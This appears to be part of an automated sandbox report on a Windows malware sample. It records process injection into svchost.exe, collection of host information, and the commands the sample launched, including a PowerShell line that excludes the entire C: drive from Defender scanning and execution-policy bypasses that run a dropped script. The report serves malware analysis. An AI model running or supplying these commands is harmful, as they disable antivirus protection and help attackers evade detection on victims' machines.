                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D07E50 _memset,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,VirtualAllocEx,WriteProcessMemory,GetThreadContext,SetThreadContext,ResumeThread,6_2_02D07E50
                      Contains functionality to inject threads in other processes
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D077E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,6_2_02D077E0
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe6_2_02D077E0
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe6_2_02D077E0
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeProcess created: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe "C:\Users\user\AppData\Roaming\FIWszl1A8l.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                      Source: FIWszl1A8l.exe, 00000006.00000002.3790306208.00000000032C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: inProgram Manager
                      Source: FIWszl1A8l.exe, 00000006.00000003.1775024265.00000000041B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .168.2.9 0 min965969Windows 10 Pro10.0.190454HDD:1WW 223 Gb Free 168 Gb Mem: 8 Gb Free3 Gb Microsoft Basic Render Driver 0 5140 Microsoft Basic Render Driver 0 5140 Program Manager
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,6_2_02D05430
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
